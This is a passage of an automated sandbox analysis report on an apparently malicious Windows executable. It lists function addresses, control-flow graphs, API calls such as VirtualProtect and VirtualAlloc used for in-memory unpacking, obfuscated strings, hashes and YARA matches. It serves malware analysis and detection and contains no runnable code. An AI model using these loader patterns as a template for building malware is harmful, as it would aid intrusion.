                                                                                                                                                                      • Instruction ID: e82aace720d20b83cc3bb85a16c632cc2cd4ec3f315796bb00328e7d2061693a
                                                                                                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 95B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB395D771AE41CF94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 005CBF60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67timeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 33 5cbf60-5cbf8b call 40c410 36 5cbf90-5cbf9b 33->36 37 5cbf9d-5cbfa5 GetSystemTimes 36->37 38 5cbfaa-5cbfab 36->38 37->38 38->36 39 5cbfad-5cbfbb 38->39 40 5cbfc0-5cbfc5 39->40 41 5cbff7-5cbffd 40->41 42 5cbfc7-5cbff2 FlushFileBuffers GetVolumeInformationW 40->42 43 5cc00e-5cc013 41->43 44 5cbfff-5cc009 41->44 42->41 45 5cc029-5cc030 43->45 46 5cc015-5cc01f 43->46 44->43 45->40 47 5cc032 call 5cbb00 45->47 46->45 49 5cc037-5cc050 call 401114 47->49
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemTimes.KERNEL32(00000000,00000000,00000000,?,00000000,?,004015D9,00400000,00000000,00000000,0000000A), ref: 005CBFA3
                                                                                                                                                                      • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,004015D9,00400000,00000000,00000000,0000000A), ref: 005CBFC9
                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(Xediko poxucaze mavegogeje,?,00000000,?,?,?,?,00000000,?,00000000,?,004015D9,00400000,00000000,00000000,0000000A), ref: 005CBFF0
                                                                                                                                                                      Strings
                                                                                                                                                                      • Xediko poxucaze mavegogeje, xrefs: 005CBFEB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffersFileFlushInformationSystemTimesVolume
                                                                                                                                                                      • String ID: Xediko poxucaze mavegogeje
                                                                                                                                                                      • API String ID: 2067870256-956893252
                                                                                                                                                                      • Opcode ID: 9c29d636fe28b14d3de728b9c223744619c8f181c28315f7079e307b9bcecf7e
                                                                                                                                                                      • Instruction ID: 87dcb88028291979576ac45ced47dbc9f44253d819400ab168a2741bc158dbd3
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c29d636fe28b14d3de728b9c223744619c8f181c28315f7079e307b9bcecf7e
                                                                                                                                                                      • Instruction Fuzzy Hash: D72199726152009FE330DB94DC45FAAB7A8F7A8714F01052FE184D72D4D7B4A9499BA2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 005CB070 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 233librarymemoryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 5cb070-5cb91c LoadLibraryW GetProcAddress VirtualProtect
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(005DDB30,0BB7EA7B,4BBE82DD,2FC43CC7,52860AB1,6AD71B2C,43FE4454,34026A25), ref: 005CB8E8
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 005CB8F4
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 005CB914
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProcProtectVirtual
                                                                                                                                                                      • String ID: )?u$:/X$F(+$O8##$R'._$U99x$VirtualProtect$X2R$dFfX$v;^:$o:?$6
                                                                                                                                                                      • API String ID: 3509694964-2834981808
                                                                                                                                                                      • Opcode ID: b384f59d4b4bb60364d658c9fb51883fdb790552a802292acc0393d197c4be19
                                                                                                                                                                      • Instruction ID: 114222216d86862ff262c135b643685e00db7299ddb832d236b655078086c967
                                                                                                                                                                      • Opcode Fuzzy Hash: b384f59d4b4bb60364d658c9fb51883fdb790552a802292acc0393d197c4be19
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C02A6B400E385CBD2B09F469689B8EBBF0BB91708F618E0DD5DD1A224CB754589CF97
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 027E0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 16 27e0420-27e04f8 18 27e04ff-27e053c CreateWindowExA 16->18 19 27e04fa 16->19 21 27e053e 18->21 22 27e0540-27e0558 PostMessageA 18->22 20 27e05aa-27e05ad 19->20 21->20 23 27e055f-27e0563 22->23 23->20 24 27e0565-27e0579 23->24 24->20 26 27e057b-27e0582 24->26 27 27e05a8 26->27 28 27e0584-27e0588 26->28 27->23 28->27 29 27e058a-27e0591 28->29 29->27 30 27e0593-27e0597 call 27e0110 29->30 32 27e059c-27e05a5 30->32 32->27
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 027E0533
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1644755035.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_27e0000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                      • API String ID: 716092398-2341455598
                                                                                                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                      • Instruction ID: 7f432b2f6308650bb72f9dd2f47fa6d0e5536c6c2d77e062421cba15540899ef
                                                                                                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                      • Instruction Fuzzy Hash: 56510570D08388DAEF11CBA8C849B9DBFB2AF15708F144058D5497F286C3FA5658CB66
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 027E05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 52 27e05b0-27e05d5 53 27e05dc-27e05e0 52->53 54 27e061e-27e0621 53->54 55 27e05e2-27e05f5 GetFileAttributesA 53->55 56 27e05f7-27e05fe 55->56 57 27e0613-27e061c 55->57 56->57 58 27e0600-27e060b call 27e0420 56->58 57->53 60 27e0610 58->60 60->57
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 027E05EC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1644755035.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_27e0000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID: apfHQ$o
                                                                                                                                                                      • API String ID: 3188754299-2999369273
                                                                                                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                      • Instruction ID: 254f5c61f530ae92135ba910954e502fca8adbe0f9bed140f95a44f58ceb4157
                                                                                                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                      • Instruction Fuzzy Hash: 820121B0C0425CEEDF11DBA8C5187AEBFB5AF45308F1480D9C4193B241D7B69B58CBA1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 005CB920 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 61 5cb920-5cb956 LoadLibraryA
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(msimg32.dll,005CBE83), ref: 005CB950
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID: msimg32.dll
                                                                                                                                                                      • API String ID: 1029625771-3287713914
                                                                                                                                                                      • Opcode ID: d69ac8f07516ae5babaf28393494b8700a043927d8e5ec5c2d50b68a6a375d74
                                                                                                                                                                      • Instruction ID: 891abc78e4b4e0e2f99fad0386603cce6b3cb964d1c837374360e84fa538d917
                                                                                                                                                                      • Opcode Fuzzy Hash: d69ac8f07516ae5babaf28393494b8700a043927d8e5ec5c2d50b68a6a375d74
                                                                                                                                                                      • Instruction Fuzzy Hash: 25D0C26456B38099CB71CF24BA497553FF0B731704B54514BD0509A372CBB4494DFB9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 026257C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 62 26257c6-26257df 63 26257e1-26257e3 62->63 64 26257e5 63->64 65 26257ea-26257f6 CreateToolhelp32Snapshot 63->65 64->65 66 2625806-2625813 Module32First 65->66 67 26257f8-26257fe 65->67 68 2625815-2625816 call 2625485 66->68 69 262581c-2625824 66->69 67->66 74 2625800-2625804 67->74 72 262581b 68->72 72->69 74->63 74->66
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 026257EE
                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 0262580E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1644186727.0000000002625000.00000040.00000020.00020000.00000000.sdmp, Offset: 02625000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_2625000_5A89.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction ID: 7a5bc1644e3598107a14958a3a66a428fd9dd9ac399b500709a6be0460d6a43f
                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction Fuzzy Hash: 09F09631200B30AFD7343BF5AC8DBAE76E8AF49725F500529E643911C0DBB4E8494E61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02625485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 91 2625485-26254bf call 2625798 94 26254c1-26254f4 VirtualAlloc call 2625512 91->94 95 262550d 91->95 97 26254f9-262550b 94->97 95->95 97->95
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 026254D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1644186727.0000000002625000.00000040.00000020.00020000.00000000.sdmp, Offset: 02625000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_2625000_5A89.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction ID: 690c954585dd569fad11f01542b73ecac7a5dc682525390b691943ccdf9339ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D113C79A00208EFDB01DF98C985E99BFF5AF08350F458094F949AB361D371EA90DF94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 005CB040 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 101 5cb040-5cb053 LocalAlloc
                                                                                                                                                                      APIs
                                                                                                                                                                      • LocalAlloc.KERNELBASE(00000000,?,005CBE21), ref: 005CB048
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3494564517-0
                                                                                                                                                                      • Opcode ID: 712627f6e3d671fe9d165d5daeeadb9750f9c8d6018b204c39530778e68b6b22
                                                                                                                                                                      • Instruction ID: fd58ec759ed296cf03c4c8f392bb4d7a75ea53041bc90eac38f44cbd12a28a23
                                                                                                                                                                      • Opcode Fuzzy Hash: 712627f6e3d671fe9d165d5daeeadb9750f9c8d6018b204c39530778e68b6b22
                                                                                                                                                                      • Instruction Fuzzy Hash: D9B092B1103100DBE3208BA0AE48B103BA8E324602F010213B60085660CB701808AA21
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 005CBB00 Relevance: 70.2, APIs: 31, Strings: 9, Instructions: 248timememorywindowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 111 5cbb00-5cbb1e call 40c410 114 5cbb29-5cbb30 111->114 115 5cbb6c-5cbb73 114->115 116 5cbb32-5cbb53 GetTickCount SetLastError GetConsoleAliasesW 114->116 119 5cbb7e-5cbb85 115->119 117 5cbb6a 116->117 118 5cbb55-5cbb5c 116->118 117->114 120 5cbb5e-5cbb62 CreateDirectoryW 118->120 121 5cbb68 118->121 123 5cbbaf-5cbbb6 119->123 124 5cbb87-5cbb8e 119->124 120->121 121->115 127 5cbbbc-5cbc26 InterlockedIncrement DestroyIcon call 4066f0 SetDefaultCommConfigW FreeEnvironmentStringsW GetCurrentDirectoryA EnumDateFormatsExA 123->127 128 5cbc5d-5cbc67 123->128 125 5cbb9c-5cbba3 124->125 126 5cbb90-5cbb96 124->126 132 5cbbad 125->132 133 5cbba5-5cbba7 ResetEvent 125->133 126->125 139 5cbc28-5cbc2a GetStartupInfoW 127->139 140 5cbc30-5cbc37 127->140 130 5cbe1c-5cbe2b call 5cb040 128->130 131 5cbc6d-5cbc8b 128->131 146 5cbe3c-5cbe48 130->146 135 5cbc8d-5cbc99 OpenJobObjectA 131->135 136 5cbca3-5cbe19 GetConsoleAliasesLengthA DnsHostnameToComputerNameA WideCharToMultiByte GetLocaleInfoA TzSpecificLocalTimeToSystemTime SetCurrentDirectoryA MoveFileExW OpenWaitableTimerA CompareStringW GetProcessHeap call 40129d call 401123 * 2 call 4066f0 call 401123 call 401000 call 401286 call 401427 131->136 132->119 133->132 135->136 136->130 139->140 143 5cbc4d-5cbc5a call 401010 140->143 144 5cbc39-5cbc47 GetModuleHandleExA 140->144 143->128 144->143 147 5cbe7e-5cbe83 call 5cb920 call 5cb070 146->147 148 5cbe4a-5cbe7c 146->148 160 5cbe88-5cbe9f call 5cba50 147->160 148->146 166 5cbeb0-5cbeba 160->166 168 5cbebc-5cbec3 166->168 169 5cbef1 166->169 171 5cbec5-5cbecb SetProcessWorkingSetSize 168->171 172 5cbed1-5cbedb 168->172 169->169 171->172 174 5cbedd-5cbee9 172->174 175 5cbeef 172->175 174->175 175->166
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 005CBB32
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 005CBB3A
                                                                                                                                                                      • GetConsoleAliasesW.KERNEL32(00000000,00000000,00000000), ref: 005CBB46
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 005CBB62
                                                                                                                                                                      • ResetEvent.KERNEL32(00000000), ref: 005CBBA7
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 005CBBC0
                                                                                                                                                                      • DestroyIcon.USER32(00000000), ref: 005CBBC8
                                                                                                                                                                      • _memset.LIBCMT ref: 005CBBE3
                                                                                                                                                                      • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 005CBBF6
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CBBFE
                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000000,?), ref: 005CBC0D
                                                                                                                                                                      • EnumDateFormatsExA.KERNEL32(00000000,00000000,00000000), ref: 005CBC19
                                                                                                                                                                      • GetStartupInfoW.KERNEL32(00000000), ref: 005CBC2A
                                                                                                                                                                      • GetModuleHandleExA.KERNEL32(00000000,tasazonobuwesixit,?), ref: 005CBC47
                                                                                                                                                                      • OpenJobObjectA.KERNEL32(00000000,00000000,00000000), ref: 005CBC93
                                                                                                                                                                      • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 005CBCA5
                                                                                                                                                                      • DnsHostnameToComputerNameA.KERNEL32(royariciguvecogowaditumihavozofilacuhadaxedayexecojafalanocitikogeduluwanifapu,?,?), ref: 005CBCBE
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CBCD4
                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 005CBCE7
                                                                                                                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(?,00000000,00000000), ref: 005CBD40
                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000), ref: 005CBD48
                                                                                                                                                                      • MoveFileExW.KERNEL32(Ruz,Koyotu zoxivevicoyin dixiyutije,00000000), ref: 005CBD5A
                                                                                                                                                                      • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 005CBD66
                                                                                                                                                                      • CompareStringW.KERNEL32(00000000,00000000,sekiziguleguhu,00000000,jejalasejipakeyijinikekicelilup,00000000), ref: 005CBD7E
                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 005CBD84
                                                                                                                                                                      • _wprintf.LIBCMT ref: 005CBDA2
                                                                                                                                                                      • _calloc.LIBCMT ref: 005CBDAE
                                                                                                                                                                      • _calloc.LIBCMT ref: 005CBDBA
                                                                                                                                                                      • _memset.LIBCMT ref: 005CBDDC
                                                                                                                                                                      • _calloc.LIBCMT ref: 005CBDF4
                                                                                                                                                                        • Part of subcall function 005CB920: LoadLibraryA.KERNELBASE(msimg32.dll,005CBE83), ref: 005CB950
                                                                                                                                                                        • Part of subcall function 005CBA50: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CBA8B
                                                                                                                                                                        • Part of subcall function 005CBA50: ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 005CBAA8
                                                                                                                                                                        • Part of subcall function 005CBA50: CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CBABE
                                                                                                                                                                        • Part of subcall function 005CBA50: FileTimeToLocalFileTime.KERNEL32 ref: 005CBADE
                                                                                                                                                                      • SetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 005CBECB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$DirectoryFile_calloc$AliasesConsoleCreateCurrentEnvironmentEventFreeInfoLocalOpenProcessStrings_memset$ByteCharCommCompareComputerConfigCountDateDefaultDestroyEnumErrorFormatsHandleHeapHostnameIconIncrementInterlockedLastLengthLibraryLoadLocaleModuleMoveMultiNameNamedObjectPipeReadResetSizeSpecificStartupStringSystemTickTimerWaitableWideWorking_wprintf
                                                                                                                                                                      • String ID: %s %f %c$Koyotu zoxivevicoyin dixiyutije$Pev$Ruz$jejalasejipakeyijinikekicelilup$royariciguvecogowaditumihavozofilacuhadaxedayexecojafalanocitikogeduluwanifapu$sekiziguleguhu$tasazonobuwesixit$tl_
                                                                                                                                                                      • API String ID: 989382441-2729520857
                                                                                                                                                                      • Opcode ID: 17dbf90c6575a7b1dc114b5eed1772f5fe5563bf3d4e22f23bf0fbeb77b7ecc1
                                                                                                                                                                      • Instruction ID: 7cd02226622226ffa38fea76c291b95a36f1beab47ba32808e6d4245b6711607
                                                                                                                                                                      • Opcode Fuzzy Hash: 17dbf90c6575a7b1dc114b5eed1772f5fe5563bf3d4e22f23bf0fbeb77b7ecc1
                                                                                                                                                                      • Instruction Fuzzy Hash: 68A13171945304EFEB30DB94DD4AB997B74BB24706F1041ABF2096A2E0D7B05A88DF26
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040DB5E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0040E1C7,?,0040D0C0,?,000000BC,?), ref: 0040DB9D
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0040E1C7,?,0040D0C0,?,000000BC,?), ref: 0040DBC6
                                                                                                                                                                      • GetACP.KERNEL32(?,?,0040E1C7,?,0040D0C0,?,000000BC,?), ref: 0040DBDA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
